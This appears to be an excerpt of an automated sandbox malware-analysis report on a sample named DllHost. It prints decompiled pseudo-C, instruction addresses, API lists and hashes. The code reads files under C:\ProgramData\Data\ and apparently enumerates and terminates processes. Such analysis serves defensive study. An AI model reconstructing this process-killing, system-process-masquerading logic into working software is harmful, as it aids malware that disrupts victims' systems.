				E00007FF77FF7191B2B00(_t250, ( !=  ? r15d : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + _t576 + 0x110 + 0x10),  *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + _t576 + 0x110 + 0x48)),  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + _t576 + 0x110);
				 *(_t576 - 0x60) = _t596;
				 *(_t576 - 0x50) = _t596;
				 *((long long*)(_t576 - 0x48)) = 0xf;
				 *(_t576 - 0x60) = 0;
				r8d = 0x14;
				E00007FF77FF7191BA9A0(_t576 - 0x60, "C:\\ProgramData\\Data\\",  *((intOrPtr*)( *_t373)));
				_t534 =  >=  ?  *(_t576 - 0x40) : _t576 - 0x40;
				_t584 =  *(_t576 - 0x30);
				E00007FF77FF7191BAB00(_t423, _t576 - 0x60, _t572, _t584, _t575);
				_t566 =  >=  ?  *(_t576 - 0x60) : _t576 - 0x60;
				_t567 = ( >=  ?  *(_t576 - 0x60) : _t576 - 0x60) +  *(_t576 - 0x50);
				_t425 =  >=  ?  *(_t576 - 0x60) : _t576 - 0x60;
				 *(_t579 + 0x48) = _t596;
				 *(_t579 + 0x58) = _t596;
				r8d = 7;
				 *((long long*)(_t579 + 0x60)) = _t584;
				 *(_t579 + 0x48) = r14w;
				if (_t567 - _t425 - 8 < 0) goto 0x191b685a;
				E00007FF77FF7191BC130(_t579 + 0x48, _t567 - _t425, _t567, _t576, _t598);
				_t451 = _t596;
				 *(_t579 + 0x58) = _t451;
				 *((long long*)(_t579 + 0x38)) = _t579 + 0x48;
				if (_t425 == _t567) goto 0x191b68bc;
				r9d =  *_t425;
				if (_t451 -  *((intOrPtr*)(_t579 + 0x60)) >= 0) goto 0x191b689e;
				_t70 = _t451 + 1; // 0x1
				 *(_t579 + 0x58) = _t70;
				_t379 =  >=  ?  *(_t579 + 0x48) : _t579 + 0x48;
				 *((intOrPtr*)(_t379 + _t451 * 2)) = r9w;
				 *(_t379 + 2 + _t451 * 2) = r14w;
				goto 0x191b68a8;
				E00007FF77FF7191BC2A0(_t579 + 0x48, _t567, _t576, _t595, _t598);
				_t426 = _t425 + 1;
				if (_t425 + 1 == _t567) goto 0x191b68bc;
				goto 0x191b6870;
				_t569 =  >=  ?  *(_t579 + 0x48) : _t579 + 0x48;
				_t455 =  *((intOrPtr*)( *((intOrPtr*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + 0x260)) + 8));
				 *((long long*)(_t579 + 0x40)) = _t455;
				_t382 =  *_t455;
				 *((intOrPtr*)(_t382 + 8))();
				E00007FF77FF7191BCCA0(_t425 + 1, _t579 + 0x38, _t572);
				_t258 =  *((long long*)( *((intOrPtr*)( *_t382 + 0x60))))();
				_t459 =  *((intOrPtr*)(_t579 + 0x40));
				if (_t459 == 0) goto 0x191b6935;
				 *((intOrPtr*)( *_t459 + 0x10))();
				if (_t382 == 0) goto 0x191b6935;
				 *((long long*)( *((intOrPtr*)( *_t382))))();
				r8d = _t258 & 0xffff;
				E00007FF77FF7191BD550(_t425 + 1, _t576 + 0x220, _t576 - 0x20, _t572, _t576);
				if (( *( *((intOrPtr*)( *_t382 + 4)) + _t382 + 0x10) & 0x00000006) != 0) goto 0x191b6990;
				_t383 =  *((intOrPtr*)(_t579 + 0x70));
				if (_t383 ==  *(_t579 + 0x78)) goto 0x191b697a;
				E00007FF77FF7191B9C50(_t383, _t425 + 1, _t383, _t576 - 0x20, _t572, _t576);
				 *((long long*)(_t579 + 0x70)) =  *((long long*)(_t579 + 0x70)) + 0x20;
				goto 0x191b68d0;
				E00007FF77FF7191BBB30(_t579 + 0x68, _t383, _t576 - 0x20);
				goto 0x191b68d0;
				_t264 = E00007FF77FF7191BA390(_t425 + 1, _t576 + 0x230, _t572, _t593);
				if (_t383 != 0) goto 0x191b69cc;
				_t305 =  !=  ? r15d : 6;
				_t306 = ( !=  ? r15d : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + _t576 + 0x220 + 0x10);
				r8d = 0;
				_t265 = E00007FF77FF7191B2B00(_t264, ( !=  ? r15d : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + _t576 + 0x220 + 0x10),  *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + _t576 + 0x220 + 0x48)),  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + _t576 + 0x220);
				r8d = 0x110;
				E00007FF77FF7191D4A30(_t265, 0, _t576, _t383, _t576 - 0x20);
				E00007FF77FF7191B8490(_t425 + 1, _t576, "C:\\ProgramData\\Data\\name.txt"); // executed
				 *(_t576 - 0x80) = _t596;
				 *(_t576 - 0x70) = _t596;
				 *((long long*)(_t576 - 0x68)) = 7;
				 *(_t576 - 0x80) = r14w;
				_t472 =  *((intOrPtr*)( *((intOrPtr*)(_t576 +  *((intOrPtr*)( *_t576 + 4)) + 0x40)) + 8));
				 *((long long*)(_t579 + 0x40)) = _t472;
				_t388 =  *_t472;
				 *((intOrPtr*)(_t388 + 8))();
				E00007FF77FF7191BCCA0(_t426, _t579 + 0x38, _t572);
				_t270 =  *((long long*)( *((intOrPtr*)( *_t388 + 0x60))))();
				_t476 =  *((intOrPtr*)(_t579 + 0x40));
				if (_t476 == 0) goto 0x191b6a63;
				 *((intOrPtr*)( *_t476 + 0x10))();
				if (_t388 == 0) goto 0x191b6a63;
				 *((long long*)( *((intOrPtr*)( *_t388))))();
				r8d = _t270 & 0xffff;
				E00007FF77FF7191BD550(_t426, _t576, _t576 - 0x80, _t572, _t576);
				_t274 = E00007FF77FF7191BA390(_t426, _t576 + 0x10, _t572, _t593);
				if (_t388 != 0) goto 0x191b6aa7;
				_t390 = _t576;
				_t482 =  *((intOrPtr*)( *_t576 + 4)) + _t390;
				_t319 =  !=  ? r15d : 6;
				_t320 = ( !=  ? r15d : 6) |  *(_t482 + 0x10);
				r8d = 0;
				_t310 = ( !=  ? r15d : 6) |  *(_t482 + 0x10);
				E00007FF77FF7191B2B00(_t274, ( !=  ? r15d : 6) |  *(_t482 + 0x10),  *((long long*)(_t482 + 0x48)), _t482);
				E00007FF77FF7191B5330(_t426, _t579 + 0x68, _t576 - 0x80,  >=  ?  *(_t579 + 0x48) : _t579 + 0x48, _t576, _t596);
				if (_t390 == 0) goto 0x191b6aea;
				CloseHandle(??);
				_t486 =  >=  ?  *(_t576 - 0x80) : _t576 - 0x80;
				E00007FF77FF7191B5470(_t426,  >=  ?  *(_t576 - 0x80) : _t576 - 0x80, _t576 - 0x80, _t572);
				if (_t390 == 0) goto 0x191b6b16;
				TerminateProcess(??, ??);
				goto 0x191b6b0f;
				_t490 =  >=  ?  *(_t576 - 0x80) : _t576 - 0x80;
				E00007FF77FF7191B5470(_t390,  >=  ?  *(_t576 - 0x80) : _t576 - 0x80, _t576 - 0x80, _t572); // executed
				if (_t390 != 0) goto 0x191b6b0c;
				E00007FF77FF7191B5930(_t390,  >=  ?  *(_t579 + 0x48) : _t579 + 0x48, _t572); // executed
				goto 0x191b6b16;
				CloseHandle(??);
				_t544 =  *((intOrPtr*)(_t576 - 0x68));
				if (_t544 - 8 < 0) goto 0x191b6b56;
				if (2 + _t544 * 2 - 0x1000 < 0) goto 0x191b6b51;
				if ( *(_t576 - 0x80) -  *((intOrPtr*)( *(_t576 - 0x80) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b6e63;
				0x191d23d0();
				 *(_t576 - 0x70) = _t596;
				 *((long long*)(_t576 - 0x68)) = 7;
				 *(_t576 - 0x80) = r14w;
				 *((long long*)(_t576 +  *((intOrPtr*)( *_t576 + 4)))) = 0x192104d8;
				 *((intOrPtr*)(_t576 +  *((intOrPtr*)( *_t576 + 4)) - 4)) =  *((intOrPtr*)( *_t576 + 4)) - 0xb0;
				E00007FF77FF7191B81B0(_t576 + 0x10);
				 *((long long*)(_t576 +  *((intOrPtr*)( *_t576 + 4)))) = 0x192104e8;
				 *((intOrPtr*)(_t576 +  *((intOrPtr*)( *_t576 + 4)) - 4)) =  *((intOrPtr*)( *_t576 + 4)) - 0x18;
				 *((long long*)(_t576 + 0xb0)) = 0x191f9778;
				E00007FF77FF7191D1494(_t576 + 0xb0);
				_t547 =  *((intOrPtr*)(_t579 + 0x60));
				if (_t547 - 8 < 0) goto 0x191b6c16;
				if (2 + _t547 * 2 - 0x1000 < 0) goto 0x191b6c11;
				if ( *(_t579 + 0x48) -  *((intOrPtr*)( *(_t579 + 0x48) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b6e69;
				0x191d23d0();
				 *(_t579 + 0x58) = _t596;
				 *((long long*)(_t579 + 0x60)) = 7;
				 *(_t579 + 0x48) = r14w;
				_t550 =  *((intOrPtr*)(_t576 - 0x48));
				if (_t550 - 0x10 < 0) goto 0x191b6c65;
				if (_t550 + 1 - 0x1000 < 0) goto 0x191b6c60;
				if ( *(_t576 - 0x60) -  *((intOrPtr*)( *(_t576 - 0x60) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b6e6f;
				0x191d23d0();
				 *(_t576 - 0x50) = _t596;
				 *((long long*)(_t576 - 0x48)) = 0xf;
				 *(_t576 - 0x60) = 0;
				_t553 =  *((intOrPtr*)(_t576 - 0x28));
				if (_t553 - 0x10 < 0) goto 0x191b6cb1;
				if (_t553 + 1 - 0x1000 < 0) goto 0x191b6cab;
				if ( *(_t576 - 0x40) -  *((intOrPtr*)( *(_t576 - 0x40) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b6e75;
				0x191d23d0();
				 *((long long*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + 0x110)) = 0x191f9bc0;
				 *((intOrPtr*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + 0x10c)) =  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) - 0xb0;
				E00007FF77FF7191B9470( *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) - 0xb0, _t576 + 0x120);
				 *((long long*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + 0x110)) = 0x191f9798;
				 *((intOrPtr*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + 0x10c)) =  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) - 0x18;
				 *((long long*)(_t576 + 0x1c0)) = 0x191f9778;
				E00007FF77FF7191D1494(_t576 + 0x1c0);
				 *((long long*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + 0x220)) = 0x192104d8;
				 *((intOrPtr*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + 0x21c)) =  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) - 0xb0;
				E00007FF77FF7191B81B0(_t576 + 0x230);
				 *((long long*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + 0x220)) = 0x192104e8;
				 *((intOrPtr*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) + 0x21c)) =  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x220)) + 4)) - 0x18;
				 *((long long*)(_t576 + 0x2d0)) = 0x191f9778;
				_t288 = E00007FF77FF7191D1494(_t576 + 0x2d0);
				_t556 =  *((intOrPtr*)(_t576 - 8));
				if (_t556 - 8 < 0) goto 0x191b6de6;
				if (2 + _t556 * 2 - 0x1000 < 0) goto 0x191b6de0;
				if ( *(_t576 - 0x20) -  *((intOrPtr*)( *(_t576 - 0x20) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b6e7b;
				0x191d23d0();
				if ( *((intOrPtr*)(_t579 + 0x68)) == 0) goto 0x191b6e31;
				_t289 = E00007FF77FF7191BCC10(_t288, 0x191f9778,  *((intOrPtr*)(_t579 + 0x68)),  *((intOrPtr*)(_t579 + 0x70)), 0x192104e8);
				_t522 =  *((intOrPtr*)(_t579 + 0x68));
				if (( *(_t579 + 0x78) - _t522 & 0xffffffe0) - 0x1000 < 0) goto 0x191b6e2c;
				if (_t522 -  *((intOrPtr*)(_t522 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b6e5d;
				0x191d23d0();
				return E00007FF77FF7191D23B0(_t289, _t294,  *(_t576 + 0x330) ^ _t579);
			}






















































                                                                                                                                                              0x7ff7191b6620
                                                                                                                                                              0x7ff7191b6620
                                                                                                                                                              0x7ff7191b6620
                                                                                                                                                              0x7ff7191b6620
                                                                                                                                                              0x7ff7191b6625
                                                                                                                                                              0x7ff7191b662a
                                                                                                                                                              0x7ff7191b6634
                                                                                                                                                              0x7ff7191b663c
                                                                                                                                                              0x7ff7191b6643
                                                                                                                                                              0x7ff7191b664d
                                                                                                                                                              0x7ff7191b6654
                                                                                                                                                              0x7ff7191b6657
                                                                                                                                                              0x7ff7191b665d
                                                                                                                                                              0x7ff7191b6660
                                                                                                                                                              0x7ff7191b6665
                                                                                                                                                              0x7ff7191b6669
                                                                                                                                                              0x7ff7191b666d
                                                                                                                                                              0x7ff7191b6675
                                                                                                                                                              0x7ff7191b667c
                                                                                                                                                              0x7ff7191b6689
                                                                                                                                                              0x7ff7191b669c
                                                                                                                                                              0x7ff7191b66a4
                                                                                                                                                              0x7ff7191b66b1
                                                                                                                                                              0x7ff7191b66c4
                                                                                                                                                              0x7ff7191b66ca
                                                                                                                                                              0x7ff7191b66cf
                                                                                                                                                              0x7ff7191b66d3
                                                                                                                                                              0x7ff7191b66d7
                                                                                                                                                              0x7ff7191b66df
                                                                                                                                                              0x7ff7191b66e3
                                                                                                                                                              0x7ff7191b66e3
                                                                                                                                                              0x7ff7191b66f0
                                                                                                                                                              0x7ff7191b6709
                                                                                                                                                              0x7ff7191b670d
                                                                                                                                                              0x7ff7191b6712
                                                                                                                                                              0x7ff7191b6715
                                                                                                                                                              0x7ff7191b671e
                                                                                                                                                              0x7ff7191b672f
                                                                                                                                                              0x7ff7191b6735
                                                                                                                                                              0x7ff7191b673d
                                                                                                                                                              0x7ff7191b6742
                                                                                                                                                              0x7ff7191b6748
                                                                                                                                                              0x7ff7191b6750
                                                                                                                                                              0x7ff7191b6757
                                                                                                                                                              0x7ff7191b675a
                                                                                                                                                              0x7ff7191b6769
                                                                                                                                                              0x7ff7191b6775
                                                                                                                                                              0x7ff7191b677f
                                                                                                                                                              0x7ff7191b677f
                                                                                                                                                              0x7ff7191b6786
                                                                                                                                                              0x7ff7191b67a4
                                                                                                                                                              0x7ff7191b67a8
                                                                                                                                                              0x7ff7191b67ab
                                                                                                                                                              0x7ff7191b67ae
                                                                                                                                                              0x7ff7191b67b3
                                                                                                                                                              0x7ff7191b67b7
                                                                                                                                                              0x7ff7191b67bb
                                                                                                                                                              0x7ff7191b67c3
                                                                                                                                                              0x7ff7191b67c7
                                                                                                                                                              0x7ff7191b67d8
                                                                                                                                                              0x7ff7191b67e7
                                                                                                                                                              0x7ff7191b67ec
                                                                                                                                                              0x7ff7191b67f4
                                                                                                                                                              0x7ff7191b6802
                                                                                                                                                              0x7ff7191b6807
                                                                                                                                                              0x7ff7191b6814
                                                                                                                                                              0x7ff7191b6819
                                                                                                                                                              0x7ff7191b6821
                                                                                                                                                              0x7ff7191b6826
                                                                                                                                                              0x7ff7191b682c
                                                                                                                                                              0x7ff7191b6831
                                                                                                                                                              0x7ff7191b6841
                                                                                                                                                              0x7ff7191b6848
                                                                                                                                                              0x7ff7191b684d
                                                                                                                                                              0x7ff7191b6850
                                                                                                                                                              0x7ff7191b685f
                                                                                                                                                              0x7ff7191b6867
                                                                                                                                                              0x7ff7191b6870
                                                                                                                                                              0x7ff7191b6877
                                                                                                                                                              0x7ff7191b6879
                                                                                                                                                              0x7ff7191b687d
                                                                                                                                                              0x7ff7191b688b
                                                                                                                                                              0x7ff7191b6891
                                                                                                                                                              0x7ff7191b6896
                                                                                                                                                              0x7ff7191b689c
                                                                                                                                                              0x7ff7191b68a3
                                                                                                                                                              0x7ff7191b68a8
                                                                                                                                                              0x7ff7191b68b3
                                                                                                                                                              0x7ff7191b68ba
                                                                                                                                                              0x7ff7191b68c5
                                                                                                                                                              0x7ff7191b68e3
                                                                                                                                                              0x7ff7191b68e7
                                                                                                                                                              0x7ff7191b68ec
                                                                                                                                                              0x7ff7191b68ef
                                                                                                                                                              0x7ff7191b68f8
                                                                                                                                                              0x7ff7191b6909
                                                                                                                                                              0x7ff7191b690f
                                                                                                                                                              0x7ff7191b6917
                                                                                                                                                              0x7ff7191b691c
                                                                                                                                                              0x7ff7191b6922
                                                                                                                                                              0x7ff7191b6932
                                                                                                                                                              0x7ff7191b6935
                                                                                                                                                              0x7ff7191b6944
                                                                                                                                                              0x7ff7191b6955
                                                                                                                                                              0x7ff7191b6957
                                                                                                                                                              0x7ff7191b6961
                                                                                                                                                              0x7ff7191b696a
                                                                                                                                                              0x7ff7191b696f
                                                                                                                                                              0x7ff7191b6975
                                                                                                                                                              0x7ff7191b6986
                                                                                                                                                              0x7ff7191b698b
                                                                                                                                                              0x7ff7191b6997
                                                                                                                                                              0x7ff7191b699f
                                                                                                                                                              0x7ff7191b69bd
                                                                                                                                                              0x7ff7191b69c1
                                                                                                                                                              0x7ff7191b69c4
                                                                                                                                                              0x7ff7191b69c7
                                                                                                                                                              0x7ff7191b69ce
                                                                                                                                                              0x7ff7191b69d8
                                                                                                                                                              0x7ff7191b69e8
                                                                                                                                                              0x7ff7191b69ee
                                                                                                                                                              0x7ff7191b69f2
                                                                                                                                                              0x7ff7191b69f6
                                                                                                                                                              0x7ff7191b69fe
                                                                                                                                                              0x7ff7191b6a10
                                                                                                                                                              0x7ff7191b6a14
                                                                                                                                                              0x7ff7191b6a19
                                                                                                                                                              0x7ff7191b6a1c
                                                                                                                                                              0x7ff7191b6a25
                                                                                                                                                              0x7ff7191b6a36
                                                                                                                                                              0x7ff7191b6a3c
                                                                                                                                                              0x7ff7191b6a44
                                                                                                                                                              0x7ff7191b6a49
                                                                                                                                                              0x7ff7191b6a50
                                                                                                                                                              0x7ff7191b6a60
                                                                                                                                                              0x7ff7191b6a63
                                                                                                                                                              0x7ff7191b6a6f
                                                                                                                                                              0x7ff7191b6a78
                                                                                                                                                              0x7ff7191b6a80
                                                                                                                                                              0x7ff7191b6a8a
                                                                                                                                                              0x7ff7191b6a8e
                                                                                                                                                              0x7ff7191b6a96
                                                                                                                                                              0x7ff7191b6a9a
                                                                                                                                                              0x7ff7191b6a9d
                                                                                                                                                              0x7ff7191b6aa0
                                                                                                                                                              0x7ff7191b6aa2
                                                                                                                                                              0x7ff7191b6aac
                                                                                                                                                              0x7ff7191b6ab4
                                                                                                                                                              0x7ff7191b6ab9
                                                                                                                                                              0x7ff7191b6ac8
                                                                                                                                                              0x7ff7191b6acd
                                                                                                                                                              0x7ff7191b6ad8
                                                                                                                                                              0x7ff7191b6adf
                                                                                                                                                              0x7ff7191b6ae8
                                                                                                                                                              0x7ff7191b6af3
                                                                                                                                                              0x7ff7191b6af8
                                                                                                                                                              0x7ff7191b6b00
                                                                                                                                                              0x7ff7191b6b05
                                                                                                                                                              0x7ff7191b6b0a
                                                                                                                                                              0x7ff7191b6b0f
                                                                                                                                                              0x7ff7191b6b16
                                                                                                                                                              0x7ff7191b6b1e
                                                                                                                                                              0x7ff7191b6b36
                                                                                                                                                              0x7ff7191b6b4b
                                                                                                                                                              0x7ff7191b6b51
                                                                                                                                                              0x7ff7191b6b56
                                                                                                                                                              0x7ff7191b6b5a
                                                                                                                                                              0x7ff7191b6b62
                                                                                                                                                              0x7ff7191b6b76
                                                                                                                                                              0x7ff7191b6b89
                                                                                                                                                              0x7ff7191b6b91
                                                                                                                                                              0x7ff7191b6ba5
                                                                                                                                                              0x7ff7191b6bb5
                                                                                                                                                              0x7ff7191b6bc0
                                                                                                                                                              0x7ff7191b6bce
                                                                                                                                                              0x7ff7191b6bd4
                                                                                                                                                              0x7ff7191b6bdd
                                                                                                                                                              0x7ff7191b6bf6
                                                                                                                                                              0x7ff7191b6c0b
                                                                                                                                                              0x7ff7191b6c11
                                                                                                                                                              0x7ff7191b6c16
                                                                                                                                                              0x7ff7191b6c1b
                                                                                                                                                              0x7ff7191b6c24
                                                                                                                                                              0x7ff7191b6c2a
                                                                                                                                                              0x7ff7191b6c32
                                                                                                                                                              0x7ff7191b6c45
                                                                                                                                                              0x7ff7191b6c5a
                                                                                                                                                              0x7ff7191b6c60
                                                                                                                                                              0x7ff7191b6c65
                                                                                                                                                              0x7ff7191b6c69
                                                                                                                                                              0x7ff7191b6c71
                                                                                                                                                              0x7ff7191b6c75
                                                                                                                                                              0x7ff7191b6c7d
                                                                                                                                                              0x7ff7191b6c90
                                                                                                                                                              0x7ff7191b6ca5
                                                                                                                                                              0x7ff7191b6cab
                                                                                                                                                              0x7ff7191b6cc3
                                                                                                                                                              0x7ff7191b6cdc
                                                                                                                                                              0x7ff7191b6cea
                                                                                                                                                              0x7ff7191b6d01
                                                                                                                                                              0x7ff7191b6d17
                                                                                                                                                              0x7ff7191b6d1e
                                                                                                                                                              0x7ff7191b6d2c
                                                                                                                                                              0x7ff7191b6d3d
                                                                                                                                                              0x7ff7191b6d56
                                                                                                                                                              0x7ff7191b6d64
                                                                                                                                                              0x7ff7191b6d74
                                                                                                                                                              0x7ff7191b6d8a
                                                                                                                                                              0x7ff7191b6d91
                                                                                                                                                              0x7ff7191b6d9f
                                                                                                                                                              0x7ff7191b6da5
                                                                                                                                                              0x7ff7191b6dad
                                                                                                                                                              0x7ff7191b6dc5
                                                                                                                                                              0x7ff7191b6dda
                                                                                                                                                              0x7ff7191b6de0
                                                                                                                                                              0x7ff7191b6dee
                                                                                                                                                              0x7ff7191b6df5
                                                                                                                                                              0x7ff7191b6dff
                                                                                                                                                              0x7ff7191b6e15
                                                                                                                                                              0x7ff7191b6e2a
                                                                                                                                                              0x7ff7191b6e2c
                                                                                                                                                              0x7ff7191b6e5c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$CloseHandleProcess32$Next$CreateFirstLockitLockit::_ProcessSleepSnapshotTerminateToolhelp32__std_exception_copystd::_
                                                                                                                                                              • String ID: $C:\ProgramData\Data\$C:\ProgramData\Data\name.txt$C:\ProgramData\Data\process.txt
                                                                                                                                                              • API String ID: 2480615077-1408848187
                                                                                                                                                              • Opcode ID: 725a4aaa23425aaa52cd190a6b5f45798fb222c27c5eacf039f4346bd105dfcf
                                                                                                                                                              • Instruction ID: 42c342a724ef081df0fcff976328d8102e37c2125a2b04493810a68c9c29fc35
                                                                                                                                                              • Opcode Fuzzy Hash: 725a4aaa23425aaa52cd190a6b5f45798fb222c27c5eacf039f4346bd105dfcf
                                                                                                                                                              • Instruction Fuzzy Hash: C0328F32B04B8585EB10EF65E4943EC67B2FB84BACF904535DA1E07AA9DF38D586D310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191ED444 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 329timeCOMMONCrypto
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 789 7ff7191ed444-7ff7191ed475 call 7ff7191ecec0 call 7ff7191ecf28 794 7ff7191ed634-7ff7191ed676 call 7ff7191da628 call 7ff7191ecec0 call 7ff7191ecf28 789->794 795 7ff7191ed47b-7ff7191ed486 call 7ff7191ecec8 789->795 815 7ff7191ed7dd-7ff7191ed84d call 7ff7191da628 call 7ff7191f4e54 794->815 816 7ff7191ed67c-7ff7191ed687 call 7ff7191ecec8 794->816 795->794 801 7ff7191ed48c-7ff7191ed496 795->801 802 7ff7191ed4be-7ff7191ed4c7 call 7ff7191e6b28 801->802 803 7ff7191ed498-7ff7191ed49e 801->803 813 7ff7191ed4ca-7ff7191ed4d1 802->813 805 7ff7191ed4a1-7ff7191ed4ac 803->805 808 7ff7191ed4b6-7ff7191ed4b8 805->808 809 7ff7191ed4ae-7ff7191ed4b4 805->809 808->802 812 7ff7191ed623-7ff7191ed633 808->812 809->805 809->808 813->813 817 7ff7191ed4d3-7ff7191ed4f3 call 7ff7191e82bc call 7ff7191e6b28 813->817 834 7ff7191ed856-7ff7191ed859 815->834 835 7ff7191ed84f-7ff7191ed854 815->835 816->815 824 7ff7191ed68d-7ff7191ed698 call 7ff7191ecef8 816->824 817->812 832 7ff7191ed4f9-7ff7191ed500 817->832 824->815 833 7ff7191ed69e-7ff7191ed6c1 call 7ff7191e6b28 GetTimeZoneInformation 824->833 832->832 836 7ff7191ed502-7ff7191ed510 call 7ff7191e4464 832->836 851 7ff7191ed7b6-7ff7191ed7dc call 7ff7191eceb8 call 7ff7191ecea8 call 7ff7191eceb0 833->851 852 7ff7191ed6c7-7ff7191ed6e8 833->852 837 7ff7191ed860-7ff7191ed870 call 7ff7191e82bc 834->837 838 7ff7191ed85b-7ff7191ed85e 834->838 840 7ff7191ed8a4-7ff7191ed8b6 835->840 836->794 847 7ff7191ed516-7ff7191ed530 call 7ff7191f4418 836->847 856 7ff7191ed872 837->856 857 7ff7191ed87b-7ff7191ed896 call 7ff7191f4e54 837->857 838->840 845 7ff7191ed8c7 840->845 846 7ff7191ed8b8-7ff7191ed8bb 840->846 848 7ff7191ed8cc-7ff7191ed8f8 call 7ff7191e6b28 call 7ff7191d23b0 845->848 849 7ff7191ed8c7 call 7ff7191ed64c 845->849 846->845 853 7ff7191ed8bd-7ff7191ed8c5 call 7ff7191ed444 846->853 847->794 872 7ff7191ed536-7ff7191ed539 847->872 849->848 858 7ff7191ed6f3-7ff7191ed6fa 852->858 859 7ff7191ed6ea-7ff7191ed6f0 852->859 853->848 864 7ff7191ed874-7ff7191ed879 call 7ff7191e6b28 856->864 883 7ff7191ed89d 857->883 884 7ff7191ed898-7ff7191ed89b 857->884 865 7ff7191ed70e-7ff7191ed710 858->865 866 7ff7191ed6fc-7ff7191ed704 858->866 859->858 864->838 876 7ff7191ed712-7ff7191ed753 call 7ff7191dd9dc call 7ff7191eb214 865->876 866->865 874 7ff7191ed706-7ff7191ed70c 866->874 880 7ff7191ed544-7ff7191ed564 call 7ff7191e4ee0 872->880 881 7ff7191ed53b-7ff7191ed542 872->881 874->876 894 7ff7191ed755-7ff7191ed758 876->894 895 7ff7191ed763-7ff7191ed766 876->895 893 7ff7191ed567-7ff7191ed56a 880->893 881->872 881->880 883->840 886 7ff7191ed89f call 7ff7191e6b28 883->886 884->864 886->840 896 7ff7191ed575-7ff7191ed578 893->896 897 7ff7191ed56c-7ff7191ed573 893->897 894->895 898 7ff7191ed75a-7ff7191ed761 894->898 899 7ff7191ed769-7ff7191ed79e call 7ff7191eb214 895->899 896->893 897->896 900 7ff7191ed57a-7ff7191ed57d 897->900 898->899 908 7ff7191ed7af-7ff7191ed7b3 899->908 909 7ff7191ed7a0-7ff7191ed7a3 899->909 902 7ff7191ed57f-7ff7191ed59a call 7ff7191e4ee0 900->902 903 7ff7191ed5d8-7ff7191ed5dc 900->903 913 7ff7191ed5b1-7ff7191ed5b3 902->913 914 7ff7191ed59c 902->914 905 7ff7191ed5e3-7ff7191ed5f1 903->905 906 7ff7191ed5de-7ff7191ed5e0 903->906 910 7ff7191ed5f3-7ff7191ed608 call 7ff7191f4418 905->910 911 7ff7191ed60c 905->911 906->905 908->851 909->908 916 7ff7191ed7a5-7ff7191ed7ad 909->916 910->794 922 7ff7191ed60a 910->922 915 7ff7191ed60f-7ff7191ed621 call 7ff7191eceb8 call 7ff7191ecea8 911->915 913->903 920 7ff7191ed5b5-7ff7191ed5c8 call 7ff7191e4ee0 913->920 918 7ff7191ed59e-7ff7191ed5a3 914->918 915->812 916->851 918->913 923 7ff7191ed5a5-7ff7191ed5af 918->923 929 7ff7191ed5d1-7ff7191ed5d6 920->929 922->915 923->913 923->918 929->903 930 7ff7191ed5ca-7ff7191ed5cc 929->930 930->903 931 7ff7191ed5ce 930->931 931->929
                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E00007FF77FF7191ED444(void* __ecx, void* __eflags, intOrPtr* __rax, signed int __rbx, signed char* __rcx, long long _a8, signed int _a16, signed int _a24) {
				void* _t28;
				signed int _t37;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t49;
				void* _t50;
				signed int _t66;
				signed char* _t72;
				signed char _t80;
				intOrPtr _t92;
				intOrPtr* _t94;
				signed char* _t96;
				signed int* _t97;
